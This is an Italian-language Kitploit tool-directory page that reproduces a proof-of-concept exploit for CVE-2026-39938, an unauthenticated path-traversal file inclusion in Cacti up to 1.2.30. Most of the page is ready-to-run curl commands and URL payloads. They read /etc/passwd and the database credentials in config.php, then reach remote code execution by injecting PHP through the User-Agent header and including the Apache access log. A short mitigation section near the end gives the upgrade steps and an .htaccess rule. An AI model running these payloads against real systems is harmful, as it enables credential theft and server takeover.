Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
Strumenti/GitHubGitHub/polosss/by-poloss..-..cve-2026-39938
RicognizioneAnalisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebRaccolta InformazioniPenetration Testing
GitHubpolosss/by-poloss..-..cve-2026-39938

By-Poloss..-..CVE-2026-39938

Exploit proof-of-concept per CVE-2026-39938: inclusione di file locale non autenticata in Cacti <= 1.2.30, che consente la lettura arbitraria di file e l'esecuzione remota di codice tramite avvelenamento dei log.

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi
Vedi Repository
1 mese faNon ancora revisionato

CVE-2026-39938: Cacti <= 1.2.30 - LFI non autenticato

Riepilogo esecutivo

CampoValore
CVE IDCVE-2026-39938
Punteggio CVSS9.8 (Critico)
Prodotto interessatoCacti
Versioni interessate<= 1.2.30
Versione corretta1.2.31
Commit di correzione9871f0c

Dettagli della vulnerabilità

Causa principale

La vulnerabilità esiste in lib/rrd.php dove il parametro graph_theme viene utilizzato direttamente senza sanificazione:

CODICE VULNERABILE:

root@kitploit:~
if (isset($graph_data_array['graph_theme'])) {
    $rrdtheme = $config['base_path'] . '/include/themes/' . $graph_data_array['graph_theme'] . '/rrdtheme.php';
}

CODICE CORRETTO:

root@kitploit:~
if (isset($graph_data_array['graph_theme'])) {
    $theme = basename($graph_data_array['graph_theme']);
    if ($theme === '' || $theme === '.' || $theme === '..') {
        $theme = get_selected_theme();
    }
    $rrdtheme = $config['base_path'] . '/include/themes/' . $theme . '/rrdtheme.php';
}

Il problema: nessuna validazione contro sequenze di path traversal ../, permettendo agli attaccanti di leggere file arbitrari senza autenticazione.


Proof of Concept (PoC) - Passaggi semplici

Passo 1: Verificare la vulnerabilità - Leggere /etc/passwd

root@kitploit:~
curl -k -s "http://target-cacti/graph_image.php?action=view&local_graph_id=1&graph_theme=../../../../../../../etc/passwd"

Risultato: Il contenuto di /etc/passwd verrà visualizzato nella risposta.

Passo 2: Leggere la configurazione del database

root@kitploit:~
curl -k -s "http://target-cacti/graph_image.php?action=view&local_graph_id=1&graph_theme=../../../../include/config.php"

Risultato: Le credenziali del database (username, password) verranno esposte.

Passo 3: Esecuzione remota di codice tramite Log Poisoning

3.1 Iniettare codice PHP nel log Apache

root@kitploit:~
curl -k -s "http://target-cacti/graph_image.php?local_graph_id=1" \
  -H "User-Agent: <?php system('id'); ?>"

3.2 Eseguire il codice includendo il file di log

root@kitploit:~
curl -k -s "http://target-cacti/graph_image.php?action=view&local_graph_id=1&graph_theme=../../../../../../../var/log/apache2/access.log"

Risultato: L'output del comando (es. uid=33(www-data)) verrà visualizzato.


Endpoint comuni testati


Esempi di URL PoC

Test LFI di base

root@kitploit:~
http://target-cacti/graph_image.php?action=view&local_graph_id=1&graph_theme=../../../../../../../etc/passwd

Leggere la configurazione dell'applicazione

root@kitploit:~
http://target-cacti/graph_image.php?action=view&local_graph_id=1&graph_theme=../../../../include/config.php

Log Poisoning (Iniezione)

root@kitploit:~
http://target-cacti/graph_image.php?local_graph_id=1

Con Header: User-Agent: <?php system('id'); ?>

Log Poisoning (Esecuzione)

root@kitploit:~
http://target-cacti/graph_image.php?action=view&local_graph_id=1&graph_theme=../../../../../../../var/log/apache2/access.log

Mitigazione

Aggiornare alla versione corretta

root@kitploit:~
cd /var/www/html/cacti
git fetch --tags
git checkout tags/release/1.2.31

Verificare l'applicazione della patch

root@kitploit:~
grep -A 5 "if (isset(\$graph_data_array\['graph_theme'\]))" lib/rrd.php | grep basename

Mitigazione temporanea (.htaccess)

root@kitploit:~
RewriteCond %{QUERY_STRING} (^|&)graph_theme=\.\./ [NC]
RewriteRule ^graph_image\.php$ - [F,L]

Riferimenti

  • Avviso di sicurezza GitHub
  • Commit di correzione 9871f0c
  • NVD CVE-2026-39938

W.P.E.F

  • W.P.E.F Telegram chanel #1
  • W.P.E.F Telegram chanel #2

Report generato per scopi di ricerca sulla sicurezza Data: 27 giugno 2026

Scarica lo strumento
EndpointParametroEsempio di Payload
/graph_image.phpgraph_theme../../../../../../../etc/passwd
/graph_image.phpgraph_theme../../../../include/config.php
/graph_image.phpgraph_theme../../../../../../../var/log/apache2/access.log